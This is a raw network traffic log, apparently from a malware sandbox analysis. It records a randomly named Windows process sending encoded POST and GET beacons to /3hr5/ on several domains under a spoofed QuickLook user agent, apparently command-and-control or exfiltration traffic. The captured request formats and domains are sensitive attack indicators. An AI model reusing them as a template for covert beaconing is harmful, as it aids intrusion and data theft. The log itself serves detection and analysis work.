Process: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:31.805993080 CET | 6484 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:31.806092978 CET | 6484 | OUT | (request body data)
Dec 4, 2023 15:23:31.982289076 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Dec 4, 2023 15:23:31.982379913 CET | 2626 | OUT | (request body data)
Dec 4, 2023 15:23:31.982543945 CET | 1340 | OUT | (request body data)
Dec 4, 2023 15:23:31.982698917 CET | 1340 | OUT | (request body data)


Session ID: 12
Source IP: 192.168.11.20
Source Port: 50143
Destination IP: 37.97.254.27
Destination Port: 80
PID: 8076
Process: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:34.507900953 CET | 528 | OUT | GET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:34.687139034 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                                                              Server: Apache
                                                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              X-Varnish: 1067591423 3
                                                                                                                              Age: 19015013
                                                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 64668
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
Dec 4, 2023 15:23:34.687248945 CET | 1340 | IN
                                                                                                                              Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space
Dec 4, 2023 15:23:34.687321901 CET | 1340 | IN
                                                                                                                              Data Ascii: c-2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
Dec 4, 2023 15:23:34.687408924 CET | 1340 | IN
                                                                                                                              Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
Dec 4, 2023 15:23:34.687500000 CET | 1340 | IN
                                                                                                                              Data Ascii: erved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <
Dec 4, 2023 15:23:34.687618017 CET | 1340 | IN
                                                                                                                              Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo
Dec 4, 2023 15:23:34.687722921 CET | 1340 | IN
                                                                                                                              Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
Dec 4, 2023 15:23:34.687786102 CET | 1340 | IN
                                                                                                                              Data Ascii: a href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width=
Dec 4, 2023 15:23:34.687870026 CET | 1340 | IN
                                                                                                                              Data Ascii: 01h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g
Dec 4, 2023 15:23:34.687931061 CET | 1340 | IN
                                                                                                                              Data Ascii: 7,25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-
Dec 4, 2023 15:23:34.864106894 CET | 1340 | IN
                                                                                                                              Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 50144 | 108.179.192.34 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:40.397598982 CET | 831 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=EZvFCjpVaxEzcrgmGFimOTNUi5WoTW9RHD5DDAPayNlOakmW9fNOsXiebnD6dhfESu3A4kEP1sRIshxBDcrWxN6RK/DoTy42HHTh9fys7/fkz2QAaqL2SDtM7OtW7O5marVYR0Po5Zk6ruTzfYoGlWZthhVE1GRY6N+dJwxZ2J5Vdk3+zw==
Dec 4, 2023 15:23:40.651324987 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:40 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
Dec 4, 2023 15:23:40.651396990 CET | 1340 | IN
Dec 4, 2023 15:23:40.651437044 CET | 1340 | IN
Dec 4, 2023 15:23:40.651494026 CET | 1340 | IN
Dec 4, 2023 15:23:40.651530981 CET | 1340 | IN
Dec 4, 2023 15:23:40.651565075 CET | 530 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 50145 | 108.179.192.34 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:43.041182995 CET | 1171 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:43.289043903 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:43 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
Dec 4, 2023 15:23:43.289118052 CET | 1340 | IN
Dec 4, 2023 15:23:43.289180994 CET | 1340 | IN
Dec 4, 2023 15:23:43.289237976 CET | 1340 | IN
Dec 4, 2023 15:23:43.289287090 CET | 1340 | IN
Dec 4, 2023 15:23:43.289328098 CET | 530 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 50146 | 108.179.192.34 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:45.682343006 CET | 6484 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:46.155240059 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:45 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 50147 | 108.179.192.34 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:48.320879936 CET | 540 | OUT | GET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:48.546039104 CET | 529 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:48 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              X-Redirect-By: WordPress
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Location: http://metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38
                                                                                                                              Content-Length: 0
                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 50148 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:53.859838009 CET | 819 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=jAKGx8Xt4B8jobUPvbHPU4+ccbpO8yxTcGBO5WNcOkHwmcAPnfLX9gj9h+xVqmEPumpHwk1tsENZP5IdAaBMwG4d4r2jqOX0WF1qMiYV2vELmy4QQy12JRX9TIt6iOp/jjG+cIIiKOZA8edmRtOuNuuBUqxwfrwuEGyGPZNFQhEf4OBQ7w==
Dec 4, 2023 15:23:54.214494944 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:53 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 50149 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:56.564327002 CET | 1159 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:56.872912884 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:56 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 50150 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:59.267030954 CET | 5198 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:59.942840099 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:59 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 50151 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:24:01.968038082 CET | 536 | OUT | GET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:24:02.296098948 CET | 602 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:02 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 50152 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:24:07.593822956 CET | 834 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=4Ep+bfZdoWX7Uqo+jO8MD4sdUPabX3T7lkl8IhTpK8uoV92KOLHWsU/yqIDPRsuNTCvcv2T7WDuR/R/TgPRRLyKCUb95bmMHgzAXjki5CusHsfp1zRXWXrfTBIf1/ErHInszxR3DgM/MKUA8rdrVS4xCxUuFPhtYjbNRiBPQq8cCHOOBwQ==
                                                                                                                              Dec 4, 2023 15:24:07.760459900 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:07 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              22 | 192.168.11.20 | 50153 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:10.287143946 CET | 1174 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=4Ep+bfZdoWX7UOU+ktUMK4saI/abeXSylk58Ij+yKqGoVcqKNKHWvU/y4oDKbMuCTCy8v3f7WD6RtwfT3PRWBSKFc79CNWMZgzMhjme5BeAHtcB13FDVQLfRWYf22krBIngRxRP1g9LMJw08qdrSYIxF40vUCDEXkt5c4DP+g/9NFfPLr7bVLNJzSBIlLlHjkcxe1jaEPGfMZHW5VdrevMQiqPrSwZpr+lO7uL6x1eGP7qEeSttpx2qoHoN7or+RvQ4cNaowkm8hAxXUrbMnWeXmmaOvMsZUS8VDarUPpmtm9MNEKCJOB9LDn62e5n7C0WtHfD36OK0nBPXA8TgR0iEQd8iRaQJvEK4WdECrOZxmksJFcCSbnxGVNPGhYZmYnaG9VctoG/hFVQsoEAJfg8RzLQqUOa2w6/7UerPn7m7r6yhmmRdY1d4n1tksCB+9pKvCDIVwPpNYJBryHtahiwzkimqazJkdDd9caPm1rJ2vC1WM+5ALab9JT1W0HSRfo3r2UNs=
                                                                                                                              Dec 4, 2023 15:24:10.453571081 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:10 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


